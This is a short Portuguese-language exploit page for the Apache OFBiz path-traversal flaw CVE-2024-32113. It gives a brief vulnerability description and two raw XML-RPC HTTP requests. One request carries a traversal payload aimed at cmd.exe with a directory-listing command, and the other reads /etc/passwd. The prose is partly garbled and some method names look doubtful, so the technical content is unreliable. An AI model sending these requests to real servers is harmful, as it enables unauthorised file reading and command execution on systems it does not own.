
Exploit para Apache OFBiz CVE-2024-32113 de path traversal via requisições XML-RPC elaboradas, permitindo leitura arbitrária de arquivos e potencial execução de comandos em servidores vulneráveis.
Uma vulnerabilidade classificada como crítica foi encontrada no Apache OFBiz até a versão 18.12.12. Uma funcionalidade desconhecida é afetada por esse problema. A manipulação com uma entrada desconhecida leva a uma vulnerabilidade de path traversal. O produto usa entrada externa para construir um caminho que deve identificar um arquivo ou diretório localizado sob um diretório pai restrito, mas o produto não neutraliza corretamente elementos especiais no caminho que podem fazer com que o caminho resolva para um local fora do diretório restrito. A confidencialidade, a integridade e a disponibilidade são impactadas.
../../../../../../etc/passwd para apontar para o arquivo etc/passwd no servidor Apache OFBiz.etc/passwd, que contém informações sensíveis sobre os usuários do servidor.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>